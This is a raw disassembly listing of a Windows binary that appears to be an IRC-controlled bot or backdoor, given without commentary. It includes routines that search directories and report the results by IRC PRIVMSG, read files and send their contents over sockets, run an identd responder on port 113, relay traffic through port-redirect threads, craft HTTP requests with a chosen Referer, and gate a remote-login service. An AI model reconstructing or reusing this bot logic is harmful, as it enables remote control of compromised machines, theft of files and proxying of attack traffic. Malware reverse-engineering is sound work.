push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+var_35C]
push eax
call sub_41B9C0
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_410893
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_410898
; ---------------------------------------------------------------------------
loc_410893: ; CODE XREF: sub_41036B+51F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_410898: ; CODE XREF: sub_41036B+526�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4107DF
; ---------------------------------------------------------------------------
loc_4108E7: ; CODE XREF: sub_41036B+48B�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
loc_4108FD: ; CODE XREF: sub_41036B+315�j
push esi
loc_4108FE: ; CODE XREF: sub_41036B+3FF�j
lea eax, [ebp+var_248]
push eax
call sub_41C360
add esp, 18h
loc_41090D: ; CODE XREF: sub_41036B+444�j
; sub_41036B+483�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
cmp [ebp+arg_8], ebx
jz short loc_41093C
push 7D0h
call ds:dword_427080 ; Sleep
loc_41093C: ; CODE XREF: sub_41036B+22B�j
; sub_41036B+246�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call ds:dword_427120 ; FindNextFileA
test eax, eax
jnz loc_410590
loc_410954: ; CODE XREF: sub_41036B+21A�j
push [ebp+arg_0]
call ds:dword_427000 ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_410997
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_41C266
add esp, 14h
jmp short loc_4109CB
; ---------------------------------------------------------------------------
loc_410997: ; CODE XREF: sub_41036B+5F5�j
cmp [ebp+arg_C], ebx
jz short loc_4109B1
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_41C266
pop ecx
pop ecx
jmp short loc_4109CB
; ---------------------------------------------------------------------------
loc_4109B1: ; CODE XREF: sub_41036B+62F�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_41C266
add esp, 10h
loc_4109CB: ; CODE XREF: sub_41036B+62A�j
; sub_41036B+644�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_41036B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109F1 proc near ; CODE XREF: sub_40FF31+13C�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:dword_4270F8 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410AA9
push esi
push ebx
call ds:dword_427114 ; GetFileSize
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_410AA2
loc_410A36: ; CODE XREF: sub_4109F1+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_41BF70
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_410A53
mov edi, [ebp+arg_4]
loc_410A53: ; CODE XREF: sub_4109F1+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:dword_427128 ; SetFilePointer
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call ds:dword_4270EC ; ReadFile
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_410A9D
call dword_4CB968 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_410AA2
xor eax, eax
loc_410A9D: ; CODE XREF: sub_4109F1+9B�j
sub [ebp+arg_4], eax
jnz short loc_410A36
loc_410AA2: ; CODE XREF: sub_4109F1+43�j
; sub_4109F1+A8�j
push ebx
call ds:dword_427070 ; CloseHandle
loc_410AA9: ; CODE XREF: sub_4109F1+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_4109F1 endp
; =============== S U B R O U T I N E =======================================
sub_410AAE proc near ; CODE XREF: sub_4100B4+181�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_41B9C0
test eax, eax
pop ecx
jbe short loc_410AD7
loc_410AC1: ; CODE XREF: sub_410AAE+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_410ACB
mov byte ptr [esi+edi], 2Fh
loc_410ACB: ; CODE XREF: sub_410AAE+17�j
push edi
inc esi
call sub_41B9C0
cmp esi, eax
pop ecx
jb short loc_410AC1
loc_410AD7: ; CODE XREF: sub_410AAE+11�j
mov eax, edi
pop edi
pop esi
retn
sub_410AAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410ADC proc near ; CODE XREF: sub_401ACD+51B7�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call dword_4CB944 ; WSAStartup
push 6
push 1
push 2
call dword_4CBA54 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call dword_4CB9D4 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40A8F0
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz short loc_410BB9
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_410B55
mov eax, offset byte_43DB88
loc_410B55: ; CODE XREF: sub_410ADC+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_41C360
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call dword_4CBA24 ; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_41CD20
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call dword_4CB9EC ; recv
pop esi
loc_410BB9: ; CODE XREF: sub_410ADC+6B�j
push ebx
call dword_4CBA6C ; closesocket
call dword_4CB92C ; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_41C266
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_410BF9
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_410BF9: ; CODE XREF: sub_410ADC+102�j
pop edi
pop ebx
leave
retn
sub_410ADC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410BFD proc near ; DATA XREF: sub_401221+445�o
; sub_401ACD+438B�o
var_238 = byte ptr -238h
var_38 = byte ptr -38h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_1C]
push esi
push eax
mov [ebp+var_8], esi
call sub_41BF70
add esp, 0Ch
mov [ebp+var_1C], 2
push 71h
call dword_4CB9D4 ; htons
push esi
push 1
push 2
mov [ebp+var_1A], ax
mov [ebp+var_18], esi
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410D61
mov eax, [ebp+arg_0]
push edi
imul eax, 234h
mov dword_43E91C[eax], ebx
lea eax, [ebp+var_1C]
push eax
push ebx
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jz loc_410D61
push 5
push ebx
call dword_4CB9FC ; listen
cmp eax, 0FFFFFFFFh
jz loc_410D61
mov [ebp+var_C], edi
mov edi, 200h
loc_410C88: ; CODE XREF: sub_410BFD+EA�j
; sub_410BFD+14D�j ...
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
call dword_4CBA68 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_410D5C
movzx eax, [ebp+var_2A]
push eax
push [ebp+var_28]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_238]
push offset dword_435164
push eax
call sub_41C266
lea eax, [ebp+var_238]
push eax
call sub_415D38
add esp, 14h
lea eax, [ebp+var_238]
push esi
push edi
push eax
push [ebp+var_4]
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410C88
lea eax, [ebp+var_238]
push esi
push eax
call sub_4184CC
push 0Ch
lea eax, [ebp+var_38]
push esi
push eax
call sub_41BF70
push esi
push esi
lea eax, [ebp+var_38]
push 2
push eax
call sub_40AE84
add esp, 24h
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp+var_238]
push edi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_238]
push esi
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_4]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz loc_410C88
mov [ebp+var_8], 1
jmp loc_410C88
; ---------------------------------------------------------------------------
loc_410D5C: ; CODE XREF: sub_410BFD+A0�j
cmp [ebp+var_8], esi
jnz short loc_410D88
loc_410D61: ; CODE XREF: sub_410BFD+47�j
; sub_410BFD+6B�j ...
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_238]
push offset dword_435120
push eax
call sub_41C266
lea eax, [ebp+var_238]
push eax
call sub_415D38
add esp, 10h
loc_410D88: ; CODE XREF: sub_410BFD+162�j
push ebx
call dword_4CBA6C ; closesocket
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_410BFD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410DAB proc near ; DATA XREF: sub_401ACD+605D�o
var_350 = byte ptr -350h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 350h
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_150]
push 10h
rep movsd
pop edi
mov dword ptr [eax+120h], 1
xor esi, esi
push edi
lea eax, [ebp+var_14]
push esi
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_44]
call dword_4CB9D4 ; htons
push 6
push 1
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
mov [ebp+var_4], edi
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_410F17
mov ecx, [ebp+var_40]
push 1
imul ecx, 234h
push 401h
push esi
push eax
mov dword_43E91C[ecx], eax
call dword_4CB8E4 ; WSAAsyncSelect
lea eax, [ebp+var_14]
push edi
push eax
push [ebp+arg_0]
call dword_4CBA00 ; bind
test eax, eax
jnz loc_410F17
push 0Ah
push [ebp+arg_0]
call dword_4CB9FC ; listen
test eax, eax
jnz loc_410F17
loc_410E5B: ; CODE XREF: sub_410DAB+C6�j
; sub_410DAB+147�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call dword_4CBA68 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_410E5B
movzx eax, [ebp+var_26]
push [ebp+var_40]
mov [ebp+var_14C], edi
mov [ebp+var_30], esi
push eax
push [ebp+var_24]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_350]
push offset unk_4351CC
push eax
call sub_41C266
push edi
lea eax, [ebp+var_350]
push 18h
push eax
call sub_40B3BA
mov [ebp+var_3C], eax
imul eax, 234h
mov ecx, [ebp+var_40]
add esp, 20h
mov dword_43E914[eax], ecx
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_150]
push esi
push eax
push offset sub_410F3C
push esi
push esi
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3C]
imul ecx, 234h
cmp eax, esi
mov dword_43E924[ecx], eax
jz short loc_410F02
loc_410EEF: ; CODE XREF: sub_410DAB+155�j
cmp [ebp+var_30], esi
jnz loc_410E5B
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_410EEF
; ---------------------------------------------------------------------------
loc_410F02: ; CODE XREF: sub_410DAB+142�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_435190
call sub_415DAC
pop ecx
pop ecx
jmp short loc_410F1A
; ---------------------------------------------------------------------------
loc_410F17: ; CODE XREF: sub_410DAB+63�j
; sub_410DAB+97�j ...
mov edi, [ebp+arg_0]
loc_410F1A: ; CODE XREF: sub_410DAB+16A�j
push edi
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
push [ebp+var_40]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_410DAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F3C proc near ; DATA XREF: sub_410DAB+124�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_41C500
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call dword_4CBA54 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_4110F2
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_18], 2
push [ebp+var_3C]
call dword_4CB9D4 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_410FCC
lea eax, [ebp+var_13C]
push eax
call dword_4CBA58 ; gethostbyname
jmp short loc_410FDA
; ---------------------------------------------------------------------------
loc_410FCC: ; CODE XREF: sub_410F3C+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_4CB98C ; gethostbyaddr
loc_410FDA: ; CODE XREF: sub_410F3C+8E�j
cmp eax, edi
jz loc_4110F2
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push esi
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_4110F2
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset unk_435254
push eax
call sub_41C266
push esi
lea eax, [ebp+var_344]
push 18h
push eax
call sub_40B3BA
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_43E91C[ebx]
mov dword_43E914[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_43E920[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_411123
push edi
push edi
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov dword_43E924[ecx], eax
jz short loc_4110DF
loc_41108C: ; CODE XREF: sub_410F3C+15D�j
cmp [ebp+var_20], edi
jnz short loc_41109B
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_41108C
; ---------------------------------------------------------------------------
loc_41109B: ; CODE XREF: sub_410F3C+153�j
mov ebx, 1000h
loc_4110A0: ; CODE XREF: sub_410F3C+19F�j
push ebx
lea eax, [ebp+var_1344]
push edi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call dword_4CB9EC ; recv
cmp eax, edi
jle short loc_4110F2
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4110A0
jmp short loc_4110F2
; ---------------------------------------------------------------------------
loc_4110DF: ; CODE XREF: sub_410F3C+14E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_435214
call sub_415DAC
pop ecx
pop ecx
loc_4110F2: ; CODE XREF: sub_410F3C+44�j
; sub_410F3C+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_43E91C[eax]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
push [ebp+var_4]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_410F3C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411123 proc near ; DATA XREF: sub_410F3C+130�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_41C500
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_41115A: ; CODE XREF: sub_411123+7C�j
push edi
lea eax, [ebp+var_1128]
push 0
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_1128]
push 0
push edi
push eax
push dword_43E920[esi]
call dword_4CB9EC ; recv
test eax, eax
jle short loc_4111A1
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_43E91C[esi]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41115A
loc_4111A1: ; CODE XREF: sub_411123+61�j
push dword_43E920[esi]
call dword_4CBA6C ; closesocket
push [ebp+var_14]
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_411123 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111C0 proc near ; DATA XREF: sub_41144E+1BE�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_43E91C[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call dword_4CB9BC ; select
test eax, eax
jnz short loc_411244
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_411244: ; CODE XREF: sub_4111C0+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call dword_4CB9EC ; recv
lea eax, [ebp+var_2C]
push 10h
push eax
push dword ptr [esi]
call sub_4113C5
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_4113C5
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_4113C5
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call dword_4CB928 ; getpeername
test eax, eax
jz short loc_4112BD
call dword_4CB968 ; WSAGetLastError
push eax
push offset unk_43532C
call sub_415DAC
push [ebp+arg_0]
call sub_40B6D6
add esp, 0Ch
push edi
call ds:dword_4270D4 ; ExitThread
loc_4112BD: ; CODE XREF: sub_4111C0+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call dword_4CB98C ; gethostbyaddr
cmp eax, edi
jnz short loc_4112E7
push [ebp+var_18]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_B0]
push eax
call sub_41C266
jmp short loc_4112F5
; ---------------------------------------------------------------------------
loc_4112E7: ; CODE XREF: sub_4111C0+10D�j
push dword ptr [eax]
lea eax, [ebp+var_B0]
push eax
call sub_41C890
loc_4112F5: ; CODE XREF: sub_4111C0+125�j
pop ecx
pop ecx
push edi
push ebx
push offset byte_43DB88
push dword ptr [esi]
call dword_4CBA24 ; send
cmp dword_4CE72C, edi
jnz short loc_411357
push [ebp+var_18]
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_41141F
add esp, 10h
test eax, eax
jnz short loc_411357
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_411357: ; CODE XREF: sub_4111C0+14C�j
; sub_4111C0+16D�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset unk_4352F0
call sub_415DAC
push [ebp+arg_0]
call sub_4116D6
add esp, 10h
test eax, eax
jnz short loc_41139E
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_4352C4
call sub_415DAC
push [ebp+arg_0]
call sub_40B6D6
add esp, 0Ch
push ebx
call ds:dword_4270D4 ; ExitThread
loc_41139E: ; CODE XREF: sub_4111C0+1B9�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset unk_435298
call sub_415DAC
push [ebp+arg_0]
call sub_40B6D6
add esp, 10h
push edi
call ds:dword_4270D4 ; ExitThread
sub_4111C0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4113C5 proc near ; CODE XREF: sub_4111C0+9A�p
; sub_4111C0+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
cmp eax, 1
jnz short loc_411415
mov esi, [ebp+arg_4]
loc_4113E3: ; CODE XREF: sub_4113C5+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_41140A
test al, al
jz short loc_411419
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
cmp eax, 1
jz short loc_4113E3
jmp short loc_411415
; ---------------------------------------------------------------------------
loc_41140A: ; CODE XREF: sub_4113C5+27�j
push offset unk_435358
call sub_415DAC
pop ecx
loc_411415: ; CODE XREF: sub_4113C5+19�j
; sub_4113C5+43�j
xor eax, eax
jmp short loc_41141C
; ---------------------------------------------------------------------------
loc_411419: ; CODE XREF: sub_4113C5+2B�j
push 1
pop eax
loc_41141C: ; CODE XREF: sub_4113C5+52�j
pop esi
leave
retn
sub_4113C5 endp
; =============== S U B R O U T I N E =======================================
sub_41141F proc near ; CODE XREF: sub_4111C0+163�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_0]
push [esp+4+arg_8]
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_41144A
push [esp+arg_4]
push [esp+4+arg_0]
push offset unk_435384
call sub_415DAC
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41144A: ; CODE XREF: sub_41141F+11�j
push 1
pop eax
retn
sub_41141F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41144E proc near ; DATA XREF: sub_401ACD+237A�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call dword_4CB944 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_4114A7
push eax
push offset unk_4354F4
call sub_415DAC
push [ebp+var_4C]
call sub_40B6D6
add esp, 0Ch
push edi
call ds:dword_4270D4 ; ExitThread
loc_4114A7: ; CODE XREF: sub_41144E+3A�j
push edi
push offset loc_4116CC
call ds:dword_42712C ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_4114E0
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_4354B0
call sub_415DAC
pop ecx
pop ecx
call dword_4CB92C ; WSACleanup
push [ebp+var_4C]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_4114E0: ; CODE XREF: sub_41144E+67�j
push ebx
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_20], 2
push [ebp+var_50]
call dword_4CB9D4 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_411657
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov dword_43E91C[eax], ebx
